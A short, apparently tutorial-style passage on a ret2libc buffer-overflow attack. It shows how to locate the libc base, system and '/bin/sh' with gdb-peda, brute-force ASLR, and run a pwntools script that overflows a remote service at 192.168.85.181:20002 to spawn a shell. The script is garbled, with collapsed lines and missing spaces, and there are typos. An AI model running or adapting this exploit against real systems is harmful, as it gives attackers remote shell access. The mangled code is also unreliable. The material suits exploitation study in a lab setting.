If the process is creating children every time you talk with it (network server) try to read that file (probably you will need to be root).
Here you can find exactly where is the libc loaded inside the process and where is going to be loaded for every children of the process.
In this case it is loaded in 0xb75dc000 (This will be the base address of libc)
Using dgp-peda
Get address of system function, of exit function and of the string "/bin/sh" using gdb-peda:
p system
p exit
find "/bin/sh"
Bypassing ASLR
You can try to bruteforce the abse address of libc.
for off inrange(0xb7000000, 0xb8000000, 0x1000):
Code
from pwn import*c =remote('192.168.85.181',20002)c.recvline()#Bannerfor off inrange(0xb7000000, 0xb8000000, 0x1000): p ="" p +=p32(off +0x0003cb20)#system p +="CCCC"#GARBAGE p +=p32(off +0x001388da)#/bin/sh payload ='A'*0x20010+ p c.send(payload) c.interactive()#?